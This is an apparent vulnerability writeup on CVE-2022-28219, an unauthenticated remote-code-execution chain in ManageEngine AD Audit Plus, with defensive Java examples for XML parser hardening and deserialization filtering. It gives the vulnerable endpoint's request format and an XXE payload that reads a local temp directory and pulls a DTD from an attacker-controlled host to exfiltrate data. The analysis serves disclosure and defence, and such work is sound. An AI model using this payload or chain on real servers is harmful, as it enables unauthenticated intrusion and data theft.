Zoho ManageEngine AD Audit Plus CVE 2022-28219 : Unauthenticated RCE

CVE-2022-28219 is a tale of several vulnerabilities chained together to achieve RCE. This issue was reported by Naveen Sunkavally of Horizon3.ai.

TL;DR

ManageEngine AD Audit Plus is affected by a series of vulnerabilities (XXE injection, Java deserialization and path traversal) which can be chained together to achieve remote code execution in any version prior to 7060.

What makes this more interesting is that all of these vulnerabilities can be exploited without any authentication: no username or password for the affected product is required.

Introduction

ManageEngine® is an innovative producer of enterprise IT management software, offering the high-end functionality of large network management frameworks at cost-effective prices to enterprises worldwide.

AD Audit Plus

AD Audit Plus is a user-behaviour-analytics-driven audit engine which monitors user activity in an Active Directory environment. It is essentially a SIEM (Security Information and Event Management) tool. According to the information on their website, AD Audit Plus monitors the following:

Figure: Features

Figure: AD Audit Plus Dashboard


Detailed explanation on the discovery

The following is the information I gathered while exploring this vulnerability in detail:

  • The researchers checked the endpoints one by one using the web.xml file and found that /cewolf/ can be accessed by anyone without logging in.
  • Upon checking the source code of cewolf, they found a function which reads the contents of a local file and deserializes them.

  • For this deserialization to work, a file must exist on the local filesystem of the target machine.

    The local file path is passed via the imgkey parameter in an HTTP request, which hands the path to the vulnerable function so that the file's contents are deserialized.

    Figure: image.png

    The problem here is that we would need access to the internal filesystem in order to exploit this vulnerability, which is not always possible.

  • But to my surprise, the team also found an unauthenticated endpoint vulnerable to XML External Entity (XXE) injection, which uses the default Java DocumentBuilderFactory. The affected endpoint /api/agent/tabs/agentData expects JSON POST data in the following format:

      [
          {
              "DomainName": "<DOMAIN_NAME>",
              "EventCode": 4688,
              "EventType": 0,
              "TimeGenerated": 0,
              "Task Content": "<XXE_PAYLOAD>"
          }
      ]

    The only prerequisite an attacker needs to know ahead of time is the name of the fully qualified Windows domain that the ADAudit Plus application is monitoring.
    
  • We can use XML External Entities (XXE) to upload files to the remote system and also to find their location, using the following steps:

    1. We can use the jar protocol in XXE to upload a malicious zip file to the %temp% directory; the server will unzip the archive and then delete it from the %temp% directory.
    2. To stop the server from deleting the jar file, we have to keep the HTTP connection open, so that the server writes the received contents to the file but waits for the HTTP connection to close before cleaning up. To achieve this we can use this modified web server, which hangs on purpose.
    3. But we still need to know the location of the downloaded jar file in the %temp% directory; to do that we can use this tool, which will download all the files in the %temp% directory using the following XXE payload in the affected parameter.

       <?xml version="1.0" encoding="UTF-8"?>
       <!DOCTYPE data [
           <!ENTITY % file SYSTEM "file:///c:/users/a-jsmith/appdata/local/temp/">
           <!ENTITY % dtd SYSTEM "http://10.0.220.200:3000/data.dtd"> %dtd;
       ]>
       <data>&send;</data>

      Figure: xxe-ftp-server (image credit: horizon3.ai)

  • Now we can upload a malicious jar file and find the path of the uploaded file using XXE, so we can exploit the deserialization vulnerability in the /cewolf/ endpoint.
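The root cause of the XXE step above is a DocumentBuilderFactory left at its defaults. The following Java class is an added example, not code from this writeup, from Horizon3.ai or from ManageEngine: it parses a document with the same DOCTYPE-plus-external-entity shape as the payload once with a default factory and once with a hardened one. The entity points at a temporary file the demo creates itself, standing in for the local path an attacker would target; the class and method names are this example's own.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class XmlParserHardening {

    // Constructed sample with the same shape as the writeup's payload:
    // a DOCTYPE declaring an external entity whose value is a local file.
    // The file is a temp file this demo creates, not any real system path.
    static String sampleXml(Path localFile) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             + "<!DOCTYPE data [\n"
             + "  <!ENTITY ext SYSTEM \"" + localFile.toUri() + "\">\n"
             + "]>\n"
             + "<data>&ext;</data>";
    }

    // Default factory, as the writeup describes: the DOCTYPE is accepted and
    // external entities are resolved, so &ext; expands to the file contents.
    static DocumentBuilder defaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened factory: refuse any DOCTYPE outright (which closes external
    // entities, parameter entities and entity-expansion bombs at once), and
    // disable every external fetch as defence in depth.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Parse and report either the text the root element ended up holding
    // or the parser's rejection message.
    static String parseWith(DocumentBuilder builder, String xml) {
        try {
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            return "parsed, root text = \"" + doc.getDocumentElement().getTextContent() + "\"";
        } catch (SAXException | IOException e) {
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        Path localFile = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(localFile, "contents of a local file".getBytes(StandardCharsets.UTF_8));
            String xml = sampleXml(localFile);
            System.out.println("default  : " + parseWith(defaultBuilder(), xml));
            System.out.println("hardened : " + parseWith(hardenedBuilder(), xml));
        } finally {
            Files.deleteIfExists(localFile);
        }
    }
}
```

With the default builder the root element's text is the temp file's contents, which is exactly the file-read primitive the writeup relies on; the hardened builder stops at the DOCTYPE before any entity is declared, let alone resolved. The disallow-doctype-decl feature is the single setting that matters most; the remaining features only help if an application genuinely needs to accept a DOCTYPE.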

Figure: Pop Calc (image credit: horizon3.ai)
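The final link in the chain is the /cewolf/ function that deserializes whatever file imgkey names. The class below is an added example and not the product's code: it contrasts an unfiltered ObjectInputStream.readObject with one guarded by a JDK ObjectInputFilter allowlist, using a plain HashMap as a constructed stand-in for unexpected input. The assumption that java.lang.String is the only type the reader legitimately expects is this example's own; a real allowlist would name the application's actual classes.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;

public class DeserializationFilterDemo {

    // Assumption for this demo: the only type this reader legitimately
    // expects is java.lang.String. "!*" rejects every other class.
    static final ObjectInputFilter ALLOWLIST =
        ObjectInputFilter.Config.createFilter("java.lang.String;!*");

    // Helper used only to build constructed sample input in memory.
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // The unsafe pattern: readObject on bytes of unknown origin, no filter,
    // so any serializable class on the classpath may be instantiated.
    static Object readUnfiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // The hardened pattern: the filter is consulted before a class is
    // resolved or instantiated, so a rejected class never runs any code.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(ALLOWLIST);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize("hello");
        HashMap<String, String> unexpected = new HashMap<>();
        unexpected.put("k", "v");
        byte[] unexpectedBytes = serialize(unexpected);

        System.out.println("unfiltered, String : " + readUnfiltered(expected));
        System.out.println("unfiltered, HashMap: " + readUnfiltered(unexpectedBytes));
        System.out.println("filtered,   String : " + readFiltered(expected));
        try {
            readFiltered(unexpectedBytes);
            System.out.println("filtered,   HashMap: accepted (filter not applied?)");
        } catch (InvalidClassException e) {
            System.out.println("filtered,   HashMap: rejected (" + e.getMessage() + ")");
        }
    }
}
```

The filter rejects the HashMap with an InvalidClassException at class-resolution time, which is the property that defeats gadget chains: the dangerous class is never constructed. A process-wide default can also be set with the jdk.serialFilter system property, which is the practical choice for third-party code whose readObject calls cannot be edited.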

